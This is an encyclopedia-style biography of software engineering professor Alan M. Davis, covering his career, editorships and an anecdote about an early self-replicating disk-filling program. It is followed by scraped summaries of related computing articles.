Alan M. Davis

Last updated

Alan Mark Davis is president and CEO of Offtoa, Inc. in Westminster, Colorado. He is a retired Professor of Business Strategy and Entrepreneurship in the College of Business at the University of Colorado at Colorado Springs and in the Executive MBA program at the University of Colorado at Denver.

Contents

Career

Davis earned his master's degree in Computer Science under Donald B. Gillies at the University of Illinois at Urbana-Champaign (UIUC) in 1973 and Ph.D. in Computer Science under Thomas R. Wilcox there in 1975. At UIUC, Davis was notable for creating an early malware program. It was a process on a PDP-11 that (a) checked to see if an identical copy of itself was currently running as an active process, and if not, created a copy of itself and started it running; (b) checked to see if any disk space (which all users shared) was available, and if so, created a file the size of that space; and (c) looped back to step (a). As a result, the process stole all available disk space. When users tried to save files, the operating system advised them that the disk was full and that they needed to delete some existing files. Of course, if they did delete a file, this process would immediately snatch up the available space. When users called in a system administrator (A. Ian Stocks) to fix the problem, he examined the active processes, discovered the offending process, and deleted it. Of course, before he left the room, the still existing process would create another copy of itself, and the problem would not go away. The only way to make the computer work again was to reboot. [1]

Davis held academic positions at George Mason University and the University of Tennessee. He was a visiting faculty member at UIUC, the University of the Western Cape (South Africa), the University of Technology, Sydney (Australia), and the Technical University of Madrid (Spain). He was a Fulbright Specialist at the University of Jos (Nigeria) and Atma Jaya University, Yogyakarta (Indonesia). He held industry positions at GTE (a Director of R&D at GTE Communication Systems in Phoenix, Arizona; and Director of the Software Technology Center at GTE Laboratories in Waltham, Massachusetts), BTG (Vice President in Vienna, Virginia), and Omni-Vista (President in Colorado Springs, Colorado). He was Editor-in-Chief of IEEE Software from 1994 to 1998 and was an editor for the Journal of Systems and Software (1987-2010) and Communications of the ACM (1981-1991) and on the editorial board of the Requirements Engineering Journal (2005-2011). He was a Fulbright Senior Specialist from 2003 through 2007. He has been an IEEE Fellow since 1994 and an IEEE Life Fellow since 2015.[ citation needed ]

Books

Davis has written the following books. In 2006, his 201 Principles of Software Development was voted by ACM members as one of the 20 classic computer science books:

Related Research Articles

Computer programming or coding is the composition of sequences of instructions, called programs, that computers can follow to perform tasks. It involves designing and implementing algorithms, step-by-step specifications of procedures, by writing code in one or more programming languages. Programmers typically use high-level programming languages that are more easily intelligible to humans than machine code, which is directly executed by the central processing unit. Proficient programming usually requires expertise in several different subjects, including knowledge of the application domain, details of programming languages and generic code libraries, specialized algorithms, and formal logic.

<span class="mw-page-title-main">Operating system</span> Software that manages computer hardware resources

An operating system (OS) is system software that manages computer hardware and software resources, and provides common services for computer programs.

Software engineering is an engineering approach to software development. A practitioner, a software engineer, applies the engineering design process to develop software.

<span class="mw-page-title-main">Software testing</span> Checking software against a standard

Software testing is the act of checking whether software satisfies expectations.

A disk image is a snapshot of a storage device's structure and data typically stored in one or more computer files on another storage device.

<span class="mw-page-title-main">Peter G. Neumann</span> American computer scientist (born1932)

Peter Gabriel Neumann is a computer-science researcher who worked on the Multics operating system in the 1960s. He edits the RISKS Digest columns for ACM Software Engineering Notes and Communications of the ACM. He founded ACM SIGSOFT and is a Fellow of the ACM, IEEE, and AAAS.

In engineering, a requirement is a condition that must be satisfied for the output of a work effort to be acceptable. It is an explicit, objective, clear and often quantitative description of a condition to be satisfied by a material, design, product, or service.

<span class="mw-page-title-main">Grady Booch</span> American software engineer

Grady Booch is an American software engineer, best known for developing the Unified Modeling Language (UML) with Ivar Jacobson and James Rumbaugh. He is recognized internationally for his innovative work in software architecture, software engineering, and collaborative development environments.

In a computer operating system that uses paging for virtual memory management, page replacement algorithms decide which memory pages to page out, sometimes called swap out, or write to disk, when a page of memory needs to be allocated. Page replacement happens when a requested page is not in memory and a free page cannot be used to satisfy the allocation, either because there are none, or because the number of free pages is lower than some threshold.

<span class="mw-page-title-main">File system</span> Computer filing system

In computing, a file system or filesystem governs file organization and access. A local file system is a capability of an operating system that services the applications running on the same computer. A distributed file system is a protocol that provides file access between networked computers.

<span class="mw-page-title-main">Data corruption</span> Errors in computer data that introduce unintended changes to the original data

Data corruption refers to errors in computer data that occur during writing, reading, storage, transmission, or processing, which introduce unintended changes to the original data. Computer, transmission, and storage systems use a number of measures to provide end-to-end data integrity, or lack of errors.

Data remanence is the residual representation of digital data that remains even after attempts have been made to remove or erase the data. This residue may result from data being left intact by a nominal file deletion operation, by reformatting of storage media that does not remove data previously written to the media, or through physical properties of the storage media that allow previously written data to be recovered. Data remanence may make inadvertent disclosure of sensitive information possible should the storage media be released into an uncontrolled environment.

In computing, data recovery is a process of retrieving deleted, inaccessible, lost, corrupted, damaged, or formatted data from secondary storage, removable media or files, when the data stored in them cannot be accessed in a usual way. The data is most often salvaged from storage media such as internal or external hard disk drives (HDDs), solid-state drives (SSDs), USB flash drives, magnetic tapes, CDs, DVDs, RAID subsystems, and other electronic devices. Recovery may be required due to physical damage to the storage devices or logical damage to the file system that prevents it from being mounted by the host operating system (OS).

GPFS is high-performance clustered file system software developed by IBM. It can be deployed in shared-disk or shared-nothing distributed parallel modes, or a combination of these. It is used by many of the world's largest commercial companies, as well as some of the supercomputers on the Top 500 List. For example, it is the filesystem of the Summit at Oak Ridge National Laboratory which was the #1 fastest supercomputer in the world in the November 2019 Top 500 List. Summit is a 200 Petaflops system composed of more than 9,000 POWER9 processors and 27,000 NVIDIA Volta GPUs. The storage filesystem is called Alpine.

Anti–computer forensics or counter-forensics are techniques used to obstruct forensic analysis.

<span class="mw-page-title-main">Computer virus</span> Computer program that modifies other programs to replicate itself and spread

A computer virus is a type of malware that, when executed, replicates itself by modifying other computer programs and inserting its own code into those programs. If this replication succeeds, the affected areas are then said to be "infected" with a computer virus, a metaphor derived from biological viruses.

<span class="mw-page-title-main">Kernel (operating system)</span> Core of a computer operating system

The kernel is a computer program at the core of a computer's operating system and generally has complete control over everything in the system. The kernel is also responsible for preventing and mitigating conflicts between different processes. It is the portion of the operating system code that is always resident in memory and facilitates interactions between hardware and software components. A full kernel controls all hardware resources via device drivers, arbitrates conflicts between processes concerning such resources, and optimizes the utilization of common resources e.g. CPU & cache usage, file systems, and network sockets. On most systems, the kernel is one of the first programs loaded on startup. It handles the rest of startup as well as memory, peripherals, and input/output (I/O) requests from software, translating them into data-processing instructions for the central processing unit.

In engineering, debugging is the process of finding the root cause of and workarounds and possible fixes for bugs.

A distributed operating system is system software over a collection of independent software, networked, communicating, and physically separate computational nodes. They handle jobs which are serviced by multiple CPUs. Each individual node holds a specific software subset of the global aggregate operating system. Each subset is a composite of two distinct service provisioners. The first is a ubiquitous minimal kernel, or microkernel, that directly controls that node's hardware. Second is a higher-level collection of system management components that coordinate the node's individual and collaborative activities. These components abstract microkernel functions and support user applications.

A distributed file system for cloud is a file system that allows many clients to have access to data and supports operations on that data. Each data file may be partitioned into several parts called chunks. Each chunk may be stored on different remote machines, facilitating the parallel execution of applications. Typically, data is stored in files in a hierarchical tree, where the nodes represent directories. There are several ways to share files in a distributed architecture: each solution must be suitable for a certain type of application, depending on how complex the application is. Meanwhile, the security of the system must be ensured. Confidentiality, availability and integrity are the main keys for a secure system.

References

  1. Davis, Alan M. (July–August 2006). "First Virus?". IEEE Software. 23 (4): 8–10. doi:10.1109/MS.2006.101.